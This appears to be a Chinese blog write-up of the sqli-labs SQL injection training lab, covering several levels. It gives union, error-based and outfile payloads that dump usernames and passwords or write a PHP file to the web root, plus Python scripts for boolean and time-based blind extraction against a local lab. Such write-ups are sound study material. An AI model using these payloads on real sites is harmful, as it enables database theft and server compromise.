sqli-labs闯关复现

于 2024-08-06 01:07:57 发布
阅读量104 收藏 1
点赞数 2
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70638961/article/details/140937042
版权
1.第一关:

        

提示我们输入数字值得id,我们先输入

?id=1

有回显内容,说明我们已经进入了数据库进行查询。

尝试联表注入:

       第一步:首先我们需要知道一张表有几列,可以通过报错和正常回显来判断有几列。

这里两个知识点:

        1.正常使用mysql语句是无法查询出来的,由于是字符型,需要使用 ' 单引号来闭合,达到逃脱单引号的控制

        2.-- 空格是mysql的注释符,因为+加号是和空格编码成一样的%20,具体证明可以查看各大官方文档,例如华三。

?id=1'order by 3 --+

?id=1'order by 4 --+

这不难看出,这个表有三列。

        第二步:爆出表格的哪一列显示在页面。

?id=-1'union select 1,2,3--+

确定了显示的是2和3列

        第三步:就可以开始获取自己想要知道的内容了

?id=-1'union select 1,database(),version()--+

第四步:由于我们查出来了security这个数据库名,接下来就可以一步一步查出它的账号密码有哪些。先查出表名,在根据表名查出users的列名,最后就可以直接select查出账号密码。

select table_name from tables where table_schema='security';

select column_name from columns where table_schema='security' and table_name='users';

select username,password from security.users;

 

这是在数据库里面看到的表名和列名以及密码,但是我们需要通过注入在页面回显出来。

group_concat()的作用:将查询结果连起来。

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

 到这里第一关就结束。

2.第五关:

 由于第五关没有正确的回显,所以可以尝试一下进行报错注入。

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3e,password)from users),1,32),0x7e),1)--+

注入成功,看到报错回显了账号密码,但是只有前32位,所以要以此类推知道全部回显出来。只需要吧1,32改成32,64.......

3.第七关:主要考察outfile
?id=1')) union select 1,2,"<?php phpinfo();" into outfile "C:/Study/phpstudy/phpstudy_pro/WWW/sqli-labs-master/web.php";--+

提示有语法错误不用担心,去看一下该路径下是否生成了php文件。

4.第八关:对错都不回显,但是对就不显示,错就是you are in.....

我们可以尝试一下:因为数据库名为security,第一个字母为s转换成ascii看看115是否正确。

?id=1' and ascii(substr(database(),1,2))=115--+

不难看出,这样是可以一直推出来的,但是需要尝试特别长的时间,所以我们可以选择爆破,或者用脚本跑出来。这是我使用简单的脚本:

import requests

url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

接下里只需要修改payload一步一步跑出来即可

"1' and ascii(substr((select group_concat(table_name)from information_schema.table where table_schema='security'), %d, 1)) > %d-- " % (i, mid)
5.第九关:没有任何反应,所以只能根据时间进行时间盲注,需要用到sleep()函数
import requests
import time


def process(length):
    result = ''
    for i in range(1, length + 1):
        for j in range(32, 126):
            start_time = time.time()
            response = requests.request('get', f"http://127.0.0.1/range/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(), {i}, 1))={j}, sleep({5}), 0)--+")
            process_time = time.time() - start_time
            if process_time > TIME:
                result += chr(j)
                print(result)
    return result


if __name__ == '__main__':
    TIME = 5
    process(8)

6.第十一关:

我们可以尝试一下在Username进行注入,由于这里不是地址栏,不会进行编码,所以就可以使用#,因为闭合的原因,所以Password可以随便输入。

1' union select 1,2#

可以发现确实是这样的,找到注入点,就和第一关差不多了

1' union select 1,group_concat(username ,id , password) from users#

7.第十五关

zengyu3139707847
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs环境搭建及复现
m0_74344277的博客
09-06 962
安装完后打开软件,开启nginx和mysql
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL注入:sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 6035
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
SQL注入基础总结(基于sqli-labs)
weixin_44042472的博客
08-21 240
sqli-labs基础篇总结
java时间类型查询报错,【Elasticsearch】ES中时间查询报错:Caused by: ElasticsearchParseException[failed to parse date fi...
weixin_39630106的博客
03-22 942
我真的很崩溃,先是workspace崩了,费了好久重建的workspace,然后建立了一个小demo项目,tomcat中启动却报错,挑选其中比较重要的2条信息如下: A child container failed during start 严重: Error starting static Resources java.lang.IllegalArgumentException: Documen...
个人总结-网络安全学习和CTF必不可少的一些网站
热门推荐
ida0918的博客
10-04 4万+
学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P 就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍) http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
freeking101的博客
07-02 5040
基于 Windows、Linux、Android 的渗透测试系统
【专题文章导航】本篇收录了SQL注入、漏洞复现、后渗透、新增漏洞报告四个专题的所有文章
爱国小白帽
03-07 2139
SQL注入篇 漏洞复现篇 新增漏洞报告 mysql 联合查询注入 文件上传之js绕过 【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告 对information_schema数据库的解析 文件上传之mime绕过 【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告 盲注 iis6.0解析漏洞......
【转】个人总结-网络安全学习和CTF必不可少的一些网站
weixin_30711917的博客
09-18 248
转自:http://blog.csdn.net/ida0918/article/details/52730662 学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍)http://blo...
网络安全靶场推荐,让你通过实操能快速提升实战技能!
2402_84205067的博客
07-09 1062
基于最新的kali讲解,循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL Server 临时存储过程及示例
08-05 298
在本文中,我们将深入探讨 SQL Server 中的临时存储过程,并提供一些实际的示例。在我们之前的文章中,我们讨论了 SQL Server 存储过程中的返回值。前缀创建的存储过程称为全局临时存储过程。这种类型的存储过程可以被 SQL Server 中的其他连接访问,直到创建该过程的连接关闭为止。在数据库中临时创建的存储过程称为临时存储过程,这些存储过程不会永久存储在数据库中。临时存储过程在连接到不支持 Transact-SQL 语句或批次的执行计划重用的早期版本的 SQL Server 时非常有用。
SQLTools插件下载与使用说明
最新发布
08-05 270
9、右键菜单SOSI信息 - 查看表信息的sosi.sql脚本的简化版, 可读方式显示字段的low_value与high_value,快速判断谓词越界;SQLTools是一个专注于SQL优化与管理的plsql developer插件,目的是把一些常用的SQL收集在一起,方便快速解决问题,提高工作效率。6、SQL固化脚本生成器 - 只需提供两个SQL_ID,就能生成用固化SQL的脚本,快速优化SQL;3、SQL优化 - 主力工具:SQL优化工具集合,用于分析、优化SQL,快速解决性能问题;
SQL Server中CPU使用率过高的排查
主宰
08-05 162
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
力扣高频SQL 50题(基础版)第三十八题
m0_70882914的博客
08-02 334
1484.按日期分组销售产品
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯关:访问您的本地服务器,并根据提示依次完成每个关卡。每个关卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个关卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值